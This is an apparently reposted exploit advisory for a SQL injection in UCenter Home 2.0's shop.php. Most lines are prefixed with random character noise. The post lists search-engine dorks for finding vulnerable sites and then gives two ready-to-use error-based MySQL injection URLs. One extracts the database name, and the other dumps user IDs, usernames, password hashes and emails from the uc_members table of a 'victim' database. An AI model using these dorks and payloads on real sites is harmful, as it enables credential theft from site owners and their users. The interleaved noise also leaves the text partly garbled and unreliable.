3 x+ H8 @- f' e9 i__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
9 i) }! G# u: v; Z, Y. }$ I6 a7 d5 c1 O
& ?* l4 [5 L9 `# A8 k
* P$ e1 x# d/ T4 D*/ Author : KnocKout 8 O$ K6 r9 w* \2 ^6 S6 [2 z
2 z# k2 I: x# B& A+ ~9 Z" ~
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 3 W) Y3 o; s) B' t0 D
* H; b; P% D: \$ m% I*/ Contact: knockoutr@msn.com
# W/ Y( N* l( H% Q& O+ g, I/ | P; D P% R
*/ Cyber-Warrior.org/CWKnocKout
% d% g+ T5 [# C; Y6 @5 m9 \$ u6 ]6 }9 I# d6 e
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
j9 b" J ?# y# Y
& P! A$ ]* i) f6 XScript : UCenter Home
* K% `& w2 G7 X
' i/ V# E+ W8 a4 k; @/ kVersion : 2.0 9 h, z" T& o/ j" @" x; [0 D) c& c- r
$ b# x9 i5 I6 g0 n. e5 X' ]
Script HomePage : http://u.discuz.net/
c+ K" d' P$ r @6 r) B/ [2 f: I8 s; }
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 s0 ~$ w1 R E) `
2 t4 n" m$ }: i! l0 E2 _7 ~4 h) QDork : Powered by UCenter inurl:shop.php?ac=view
! \. I8 O* v( A. G1 o9 P- q- z, T8 A! ]" U
Dork 2 : inurl:shop.php?ac=view&shopid= D9 |" q# z7 b$ _# g E# S8 ?
" K. K2 [. J5 @0 Z! Z. x6 r8 Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 8 {& U& L3 C* }( v/ @) t9 m8 U
% Y0 r' [- E6 i( T: T8 \( ]; F
Vuln file : Shop.php
$ k( k. i% T' D& e# l. _4 G" i( G0 P; ~, H
value's : (?)ac=view&shopid=
( Z; c p# X9 A# m- d( x+ u/ U: f$ u3 l
Vulnerable Style : SQL Injection (MySQL Error Based)
* F$ g1 v$ G: ]& [2 p& t' o: A% s5 u' A! t1 o
Need Metarials : Hex Conversion 8 p* V2 }. `7 D5 f
7 A7 z+ V: ^! `" \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- Z* u; y: `2 k' l
; s" P7 U, n j" Q2 P) C1 dYour Need victim Database name. 7 C+ o/ u0 |" T+ L, m! ?
; H* J3 G/ q- j, K" v3 dfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 9 {1 V( E+ g( b" I* {9 Y
/ i* t4 ?1 E1 Z+ @7 a.. / l5 `- e* g& k& s
0 ~- u1 t* b" t! C5 E
DB : Okey.
" U& G( S2 A" w2 ]- F1 }; U, m- T- T. N1 ~ @) p# I% O+ t6 |# i
your edit DB `[TARGET DB NAME]`
, z5 a3 ^$ [$ y! T7 _5 S O! K5 q1 a* _
Example : 'hiwir1_ucenter'
) Y$ ]& Q) ?/ I
8 e: I$ S8 e N4 y5 uEdit : Okey.
$ m5 q; F* k( B2 b( y/ G$ W6 ~
4 h* I" K. n1 y1 N. d. cYour use Hex conversion. And edit Your SQL Injection Exploit.. ) _4 _! C7 l8 Q3 Y' k# J, U7 u
) N: Q+ x8 [( b6 r. K5 b' j9 P
$ F" j# p7 C' k4 z+ y% B' n+ o; S8 ?. x( F3 {
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
5 w% X- z! p) _- q6 I1 a |
发表于 2013-2-27 21:31:31
收藏
支持
反对